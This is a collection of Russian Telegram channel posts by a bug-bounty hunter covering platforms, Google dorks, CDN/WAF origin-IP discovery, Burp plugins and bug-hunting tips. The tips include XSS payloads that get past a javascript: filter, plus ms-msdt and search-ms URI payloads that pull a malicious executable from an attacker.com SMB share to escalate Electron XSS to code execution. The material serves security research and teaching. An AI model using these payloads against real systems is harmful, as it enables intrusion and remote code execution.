Интересных идей для постов нет, поэтому просто публикую то, что есть.

На днях получил свою первую CVE. 7.5 по CVSS 3.0. Неплохо.

Жаль не какой-нибудь веб сервис + уязвимость довольно-таки смешная. Но всё же факт есть факт.

CVE-2022-40978

Мерча зажали :(



P.S.: перезалив, ибо фотка прикреплялась файлом :(

#Достижения #CVE

Что ломать?

Именно этот вопрос у меня появился после кражи денег запрета вывода гражданам РФ со стороны HackerOne и некоторых других площадок.

Уже прошло пол года с того момента, и я готов поделиться тем, к чему пришёл за это время.

Для дееспособных совершеннолетних граждан РФ:
bugbounty.ru;
bb.standoff365.com.

Также можно рассмотреть bugbounty.bi.zone, но у них там нет ничего, кроме собственной программы.

Для несовершеннолетних граждан РФ:
bugbounty.ru (был дан ответ, что выплаты возможны при наличии согласия от родителей);
Различные selfhosted программы, которые платят по SWIFT* и в криптовалюте.

В этот список я не стал включать hackenproof.com, которые платят в USDT, из-за сомнительных высказываний CEO. Были вбросы, что "Russians are allowed to pass the verification but not to be rewarded".

Мои фавориты - selfhosted bug bounty программы, платящие в криптовалюте.

Как их искать?:
Дорки, дорки и ещё раз дорки.

Вот пример простой дорки:

(intext:"bug bounty" | intext:"responsible disclosure") & (intext:"USDT" | intext:"BTC")

Конечно, она не найдёт все 100% программ. Можно поиграться со словами (по типу "btc" => "Bitcoin", "Bug bounty" => "bounty for bugs" и т.д.).

Этот процесс можно автоматизировать, но я предпочитаю ручками.

У многих selfhosted программ существуют некоторые проблемы с общением, иногда они могут проигнорировать сообщение.
Именно поэтому делаю так:
1. Ищу программу;
2. Нахожу какую-нибудь багу;
3. Сообщаю о ней и жду ответа;
3.1. Если ответа нет в течение 2ух недель, если не указано иного, - повторяю письмо;
4. Если был получен ответ, а лучше выплата - записываю в док и продолжаю дальше ломать цель.

Надеюсь мой опыт поможет кому-нибудь.
Всем мира, багов и выплат за них.

*Но некоторые программы всё же отказываются платить и этот момент стоит уточнить перед сдачей.


@zema_notes

#Уязвимости #BugBounty #SelfMade

Иногда WAF может являться серьёзной проблемой при эксплуатации уязвимости.

Что делать? А фиг его знает! Обходить.

Сложный, но самый надёжный и, вероятно, самый профитный путь: Попытаться обфуцировать пейлоад. Это сложно и долго, не факт что получится, поэтому не буду останавливаться на этом.

Лёгкий путь, срабатывающий время от времени: Найти реальный IP адрес ресурса. Рассмотрим поподробнее что да как делать.

В своей практике я применяю 2 сервиса: censys.io и shodan.io. Моим фаворитом является shodan.io.

Как искать?
1) По сертификату
Для Shodan запрос выглядит так: ssl.cert.subject.cn:[target]
А для Censys иначе: services.tls.certificates.chain.subject_dn:[target]

В обоих случаях [target] необходимо заменить на нашу цель, чтобы получилось что-то вроде ssl.cert.subject.cn:example.com. Если у сервера был установлен SSL сертификат, то вам выдаст все сервера, имеющие сертификат вида *.[target]*

2) По заголовку страницы
Если сервер не имеет SSL сертификата, а HTTPS идёт между cdn и пользователем, то иногда может помочь следующие запросы:
Shodan: http.noscript:[Page noscript]
Censys: services.http.response.html_noscript:[Page noscript]

[Page noscript] необходимо заменить на заголовок страницы /


Вроде это всё, что хотел написать. Всем вкусных багов и приятного времяпрепровождения 🙂

@zema_notes
#Уязвимости #Web #BugBounty

Упрощение работы с прокси (Burp, Charles, etc).

На стриме @spbctf во время разбора тасков была трансляция экрана @sh1y0. Там заметил, что Александр каким-то образом направляет запросы в прокси с определённой вкладки. В ходе небольших исследований (сообщения в личку тг 🙂) выяснилось, что это расширение Container proxy для Firefox.
Ссылка на расширение для Firefox - https://addons.mozilla.org/ru/firefox/addon/container-proxy/

Пользуюсь уже больше месяца и очень сильно полюбил его, поэтому шерю тут. ❤️


@zema_notes

#Tools

Прошёл ОлимпПГУТИ.
4-5/22 место. Обидно? Немного.

Задания вроде были лёгкие, а вроде и нет. Набрал 22 балла. У 1 места 25.

Впервые почитал литературу про переполнение буфера. Ничего не понял (да и что можно было понять за 40 минут, что у меня остались).


Теперь, похоже, стоит учиться в пывн.

x8 - сканнер параметров, написанный на Rust.
https://github.com/Sh1Yo/x8

Довольно полезный инструмент для поиска различных хедеров и/или параметров запросов. Работает лучше некоторых других популярных аналогов.
Имеет кучу вариантов изменения параметров сканнера. Поддерживает разные методы (GET/POST/PUT и другие).

#tools
@zema_notes

Обход оплаты подписки.

На многих сайтах есть различные возможности, которые доступны по подписке. Пользователь платит определённую сумму и получает доступ к приложению. Казалось бы, что может пойти не так и как можно допустить ошибку? Именно об этом я сегодня и расскажу.

Цель имеет раздел, позволяющий разработчикам разместить своё приложение на платной или бесплатной основе.

Даже на бесплатные приложения нужно оформить подписку (суммой в $0).
При оформлении отправлялся запрос, содержащий тип подписки "free". Мои знания английского языка довольно легко позволили понять, что это означает "бесплатно".

Попытался подставить такое же значение при оформлении подписки на платное приложение и... оно сработало! Я получил платное приложение абсолютно бесплатно.



#bugbounty
@zema_notes

Прошло больше месяца с последнего поста. Не очень круто, согласен. Но были свои дела, а идеи отсутствовали.

Благодарю всех за подписку. Не думал, что наберу на своём канале даже 50 подписчиков, а тут уже перешагнул за 100, несмотря на то, что я очередной скрипткидди, который оооочень редко публикует посты.

Что проделал за месяц:
0) Подготовился и сдал сессию (🎉🎉);
1) Отдыхал (Посетил кучу интересных мероприятий);
2) Потрогал траву;
3) Смотрел аниме;
4) Пытался написать свою тулзу.

И теперь подробнее о последнем пункте:
Залил в общий доступ свой проект - CloudFuck. Это моя первая попытка написать более-менее нормальный сканнер для обхода различных CDN и WAF.

Принцип работы:
0. Получение всех сабдоменов;
1. Проверка A записей на присутствие в массиве IP адресов (Akamai, CloudFront и CloudFlare);
2. Проверка поддоменов на ответ 200 OK;
3. Сканирование сабдоменов на предмет выдачи содержимого домена.

С какими API работает:
Пока что только только virustotal (обещаю исправиться и добавить другие API для лучшего поиска)

Результат работы выводится в консоль.
Результаты работы:
1. Найденные сабдомены;
2. Origin IP адреса доменов.

Чем он лучше аналогов:
Ничем (Без шуток, аналоги работают куда лучше. )

Issues, критика и битьё по попе только приветствуется.

Всех с наступающим 2023 годом. Всем благополучия и интересных баг в новом году.

Новый формат на моём канале — Статьи. Начну его с статьи про обход CDN (WAF).

Читать

@zema_notes

Всем привет!

Сегодня день благодарности разработчикам плагинов, а значит надо их поблагодарить и поделиться ими с другими.

Этим постом я хотел пошерить плагины для Burp Suite, которые могут помочь для багхантинга или пентестов.

1 - Scope Monitor.
Плагин, на который я наткнулся на днях, когда искал удобный инструмент для сохранения всех запросов во время пентеста. Оно позволяет легко отслеживать все URL из скоупа. Автоматически добавляет каждую конечную точку из Target Scope в лист, где вы можете отметить его проверенным или наоборот. Также есть экспорт в CSV, если вдруг будет необходимо передать кому список проверенных запросов.

2 - Auth Analyzer.
Неплохое расширение для бюрпа, помогающее в поиске багов, связанных с авторизацией. Автоматически подтягивает данные сессий или csrf токены. Плагин помогает искать уязвимости, связанные с правами пользователя.

3 - Logger++.
Расширение, которое поможет работать с отправленными запросами эффективнее. Позволяет фильтровать запросы по заданному выражению, отображает тулзы, отправившие запросы и многое другое. Есть экспорт истории в csv.

4 - Burp Bounty.
Плагин, который помогает в поиске уязвимостей путём добавления собственных профилей в Active и Passive сканеры бюрпа. Существует платная и бесплатная версии.

5 - Turbo Intruder.
Расширение для бюрпа, которое является "улучшенной" версией стокового Intruder`а. Имеет гибкие настройки и шаблоны, которые позволяют отправлять запросы куда эффективнее, по сравнению с оригинальным решением.


Надеюсь, что вы открыли для себя что-то новенькое ❤️

@zema_notes

XSS Hunter закрылся. Или нет?

Конечно, существует множество аналогов, но не факт, что они не воруют ваши уязвимости и данные. Но, оказывается, trufflesecurity договорились с владельцем xsshunter и теперь можно дальше пихать готовые пейлоады, не заморачиваясь с поднятием инфраструктуры и сохранности своих данных. Лично я доверяю ребятам из трюфельбезопасность и считаю, что их продукта можно не бояться.

Также, они добавили новый функционал, а именно:
Анализ CORS;
Обнаружение секретных ключей на страницах, на которых сработал пейлоад;
Обнаружение открытой .git директории;
Фичи для приватности, которые повысят защиту от случайных утечек;
Вход через Google SSO для избежания использования паролей.

Ознакомится полностью можно тут:
https://trufflesecurity.com/blog/xsshunter/


Credits to: Поросёнок Пётр (именно у него я увидел новость об этом)


Записки Земы

Всем привет! Спасибо за подписки. Уже больше >200 подписчиков! (Для меня это очень неожиданно, спасибо, @zaheck)

А теперь про сегодняшний пост:
В нынешнее время почти каждый сайт имеет различные виды дополнительного подтверждения через одноразовые коды. Сегодня я хотел бы рассказать про баги, связанные с OTP. Возможно кому-то это всё известно, но начиающим свой путь в тестировании web-приложений может оказаться полезным! Приятного прочтения!

https://telegra.ph/Pogovorim-pro-kody-podtverzhdeniya-03-28


Записки Зёмы

Давно тут не появлялся.
Разбавлю пустоту небольшими Tips для Bug Bounty.
Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ.

Что же, BB Tips #1.

XSS в Redirect.
Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже.

Вариант 1 (самый топорный, но часто срабатывает).
Payload -

javanoscript:alert(document.domain)

Вставляем, кликаем и... Ничего не происходит. Нас просто отправляет на страницу about#blocked (или about#blank).
Решение - кликать средней кнопкой мыши по ссылке.

Hint: ещё это срабатывает с Markdown.
Payload -

[a](javanoscript:alert(document.domain))

Вариант 2.
Если разработчики фильтруют строку, чтобы она не начиналась с javanoscript:, при помощи регулярного выражения следующего вида

^(?!javanoscript:).+

можно подставить пробел в начало нашей нагрузки. Если ссылка подставляется из параметров, поставьте %20, чтобы пейлоад приобрёл следующий вид:

%20javanoscript:alert()

Вставляем, кликаем СКМ, наслаждаемся XSS.

Bug Bounty Tips #2
Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти).

Что может понадобиться для упрощения работы:
Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации;
Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт.

Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут.

Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки.
Кейс 1 -
Внешние ссылки открываются во внешнем браузере.
Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши.

Кейс 2 -
Внешние ссылки открываются в самом приложении.
Если встретили такое поведение - вам упростили работу.

Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration.

Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем.

Примеры того, что можно использовать:

ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\attacker.com\smb_share\malicious_executable.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO
search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update

Эти "ссылки" необходимо открыть каким-либо образом. В случае с markdown их можно встроить в ссылки [Some Text](Payload), а затем открыть при помощи СКМ. Если вы нашли XSS/смогли открыть произвольную страницу - откройте при помощи window.open(Payload)

На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей.

@zema_notes


p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.

Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою самую лучшую находку.
Я принял участие и занял почётное 3 место.

Получил носочки, значки, промо на +3к к репорту у ВК и стикеры.

Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3


Статья про уязвимость будет уже скоро на канале.

Всем привет и с наступившим новым годом! Всем желаю покорить новые вершины и достигнуть тех целей, что поставили на этот год.

У меня уже пару месяцев лежала статья, ожидающая публикации. И вот, спустя пару месяцев отсутствия, пришло время опубликовать её, рассказать о найденом интересном баге, о новой для многих программе, а также показать то, чем бывает полезно попросить помощи, даже с довольно банальными вещами.

Приятного чтения!

https://telegra.ph/Path-Traversal--RCE-v-Windows-prilozhenii-Pyrus-Sync-09-15


По поводу взаимодействия с программой - выплата заняла больше полугода (если бы получал на PayPal, времени ушло куда меньше), сумма выплаты довольно маленькая, учитывая распространение и клиентов, которые используют это решение. Программа создана чисто для набора опыта. Тем, кто идёт туда за деньгами, делать там особо нечего.

Записки Зёмы

История одной уязвимости в Chrome

Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
Twitter
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.

Привет, это Зёма. Я вернулся. Снова.
Прошло уже больше 2 лет с великого пидо прогона граждан РФ с зарубежных площадок. В октябре 2022 года я делал пост, который касался багхантинга в новом мире. Пришло время актуализировать информацию. К сожалению (или к счастью для меня), в этот раз не будет разделения на возраст, необходимый для участия.

Начнём с площадок:
- Standoff365 - сделали крупные шаги и сделали багхантинг доступным всем! Добавили фильтры, которые позволяют отобрать программы разным группам хакерам (несовершеннолетним или гражданам не РФ);
- Bi.Zone - прикольные рейтинги, а также у них есть программы, которых нет на других платформах (например, Astra Linux);
- Bugbounty.ru - ну это ббру, ничего особо не изменилось, только добавились программы.

В это году VK в честь десятилетия программы баг баунти сделали Bug Bounty Pass. Советую принять участие.

Hackenproof ограничили доступ для РФ. Что по итогу с ними - неизвестно. Да и участие в бб у них на площадке может нести риски для граждан РФ. Не советую.


А теперь про Self-hosted программы. За это время я попробовал множество программ и хотел бы поделиться некоторыми из них, а также фидбеком.

- CardPR - отвечают быстро, платят щедро. Довольно интересные правила программы бб, но у них есть свои плюсы;
- Пешкарики - долго отвечают, выплаты относительно неплохие, есть что поискать. Было такое, что выплату разбили на 2 части, даже не предупредив об этом;
- AvanChange - платят нормально, ответы довольно быстрые, есть что покапать. Особенно подойдёт тем, кто любит поковыряться с различными криптовалютными обменниками;
- in.top - выплаты небольшие, но есть чего покапать, отвечают быстро;
- Aeza - самая противоречивая программа. Кажется платят мало, приходилось доказывать, что для эксплуатации XSS не нужно убеждать пользователя разрешить выполнение JS (если это не отключено по умолчанию);
- FunPay - с них, можно сказать, начался мой путь в бб. Приятные выплаты, накидывают соточку даже за опечатки. Ответы относительно быстрые, с Михаилом довольно приятно общаться, крутой мужик!;
- Пачка - одна из самых приятных программ. Выплаты средние, но всегда готовы обсудить баги. 1 раз выплатили за багу, про которую им было известно, но я нашёл как её можно крутануть дальше;
- Pyrus - есть что поискать. Пост про найденную у них багу уже был на канале в начале этого года. Выплату получал полгода (частично моя вина, т.к. отложил до своего совершеннолетия, но и после этого потребовалось 2 месяца, чтобы денежка до меня дошла).

Ещё есть Яндекс, они часто проводят конкурсы с большими иксами, но как-то не участвовал.

Также остаются прежние рекомендации:
- Стоит самостоятельно искать бб программы при помощи дорок поисковых систем. Почти все сайты из списка выше были найдены таким образом;
- Перед тем, как убить всё свободное время, стоит закинуть пару простых багов, чтобы оценить стоит ли программа того;
- Не всегда те, кто готовы платить за уязвимости, публично заявляют об этом;
- И, наконец, try harder!

Небольшое уточнение. Выплаты оценивал чисто для себя (обычного студента, ведущего размеренный образ жизни).

Критику и дополнения как всегда готов принять в комментариях. Возможно это повлияет на следующий пост, который когда-нибудь выйдет.

Записки Зёмы